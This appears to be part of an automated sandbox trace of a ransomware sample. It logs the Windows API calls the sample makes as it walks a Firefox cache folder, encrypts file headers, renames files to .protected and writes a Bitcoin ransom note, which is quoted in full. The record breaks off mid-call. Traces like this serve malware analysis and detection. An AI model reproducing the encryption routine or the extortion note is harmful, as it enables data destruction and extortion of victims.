wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\.") returned 102 [0086.298] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.298] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.298] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.298] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.298] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.298] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.298] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.298] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\..") returned 103 [0086.298] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.298] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.298] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.298] lstrcmpiW (lpString1="71469d01", lpString2="Windows") returned -1 [0086.298] lstrcmpiW (lpString1="71469d01", lpString2="Program Files") returned -1 [0086.298] lstrcmpiW (lpString1="71469d01", lpString2="Program Files (x86)") returned -1 [0086.299] lstrcmpiW (lpString1="71469d01", lpString2="$Recycle.bin") returned 1 [0086.299] lstrcmpiW (lpString1="71469d01", lpString2="System Volume Information") returned -1 [0086.299] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrIW (lpFirst="71469d01", lpSrch=".protected") returned 0x0 [0086.299] lstrcmpW (lpString1="71469d01", lpString2="RESTORE_FILES.txt") returned -1 [0086.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.299] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrW (lpFirst="71469d01", lpSrch=".txt") returned 0x0 [0086.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrW (lpFirst="71469d01", lpSrch=".rar") returned 0x0 [0086.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01") returned 109 [0086.299] StrStrW (lpFirst="71469d01", lpSrch=".zip") returned 0x0 [0086.300] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.309] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.309] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.310] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.310] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.310] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.310] CloseHandle (hObject=0x160) 
returned 1 [0086.310] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.protected") returned 119 [0086.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01.protected")) returned 1 [0086.311] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.311] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.311] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\RESTORE_FILES.txt") returned 118 [0086.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.312] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.312] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.312] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.312] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.312] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.312] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.313] CloseHandle (hObject=0x15c) returned 1 [0086.313] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.313] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.313] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\RESTORE_FILES.txt") returned 115 [0086.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.313] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.313] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: 
lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.314] lstrlenA (lpString="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") returned 684 [0086.314] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.314] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.314] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.314] CloseHandle (hObject=0x158) returned 1 [0086.315] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.315] lstrcmpiW (lpString1="E", lpString2="Windows") returned -1 [0086.315] lstrcmpiW (lpString1="E", lpString2="Program Files") returned -1 [0086.315] lstrcmpiW (lpString1="E", lpString2="Program Files (x86)") returned -1 [0086.315] lstrcmpiW (lpString1="E", lpString2="$Recycle.bin") returned 1 [0086.315] lstrcmpiW (lpString1="E", lpString2="System Volume Information") returned -1 [0086.315] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E") returned 97 [0086.315] lstrcmpW (lpString1="E", lpString2=".") returned 1 [0086.315] lstrcmpW (lpString1="E", lpString2="..") returned 1 [0086.316] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\*") 
returned 99 [0086.316] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.316] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.316] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.316] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.316] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.316] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.316] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\.") returned 99 [0086.316] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.316] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.316] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.316] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.316] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.316] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.316] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.317] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\..") returned 100 [0086.317] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.317] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.317] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.317] lstrcmpiW (lpString1="69", lpString2="Windows") returned -1 [0086.317] lstrcmpiW 
(lpString1="69", lpString2="Program Files") returned -1 [0086.317] lstrcmpiW (lpString1="69", lpString2="Program Files (x86)") returned -1 [0086.317] lstrcmpiW (lpString1="69", lpString2="$Recycle.bin") returned 1 [0086.317] lstrcmpiW (lpString1="69", lpString2="System Volume Information") returned -1 [0086.317] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69") returned 100 [0086.317] lstrcmpW (lpString1="69", lpString2=".") returned 1 [0086.317] lstrcmpW (lpString1="69", lpString2="..") returned 1 [0086.317] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\*") returned 102 [0086.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.318] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.318] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.318] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.318] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.318] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.318] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\.") returned 102 [0086.318] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.318] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.318] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.318] 
lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.318] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.318] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.318] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.318] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\..") returned 103 [0086.318] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.318] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.318] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="Windows") returned -1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="Program Files") returned -1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="Program Files (x86)") returned -1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="$Recycle.bin") returned 1 [0086.318] lstrcmpiW (lpString1="885EEd01", lpString2="System Volume Information") returned -1 [0086.318] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.318] StrStrIW (lpFirst="885EEd01", lpSrch=".protected") returned 0x0 [0086.318] lstrcmpW (lpString1="885EEd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.318] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.318] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.319] StrStrW (lpFirst="885EEd01", lpSrch=".txt") returned 0x0 [0086.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.319] StrStrW (lpFirst="885EEd01", lpSrch=".rar") returned 0x0 [0086.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01") returned 109 [0086.319] StrStrW (lpFirst="885EEd01", lpSrch=".zip") returned 0x0 [0086.319] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.346] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.346] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.347] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.347] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, 
lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.347] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.347] CloseHandle (hObject=0x160) returned 1 [0086.347] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.protected") returned 119 [0086.347] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01.protected")) returned 1 [0086.349] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.349] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.349] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\RESTORE_FILES.txt") returned 118 [0086.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.350] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.350] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: 